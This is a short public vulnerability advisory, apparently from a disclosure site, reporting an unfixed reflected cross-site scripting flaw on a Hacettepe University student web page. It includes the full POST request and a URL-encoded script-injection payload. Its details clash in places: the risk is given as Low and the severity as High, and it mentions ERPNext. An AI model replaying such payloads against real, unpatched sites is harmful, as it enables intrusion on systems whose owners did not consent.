lidya hacettepe Cross Site Scripting

2020.01.07
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Name: lidya.hacettepe.edu.tr Cross-site Scripting Vulnerabilities in ERPNext Vendor Homepage: lidya.hacettepe.edu.tr Vulnerability Type: Reflected Cross-site Scripting Severity: High Status: NOTFixed ---------------------------------------------------------------------------------------------------------------------------------------------- Request Headers POST /~ahmett10/bto316/ilac/ilaclar.php HTTP/1.1 Content-Length: 94 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=52hvvq2g6l8qu0slfojti0aub1 Host: lidya.hacettepe.edu.tr Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* --------------------------------------------------------------------------------------------------------------------------------------------- alert here => ara=Ara&bul=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28956925%29%3c%2fScRiPt%3e&sec=t_ilac.adi ----------------------------------------------------------------------------------------------------------------------------------------------


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top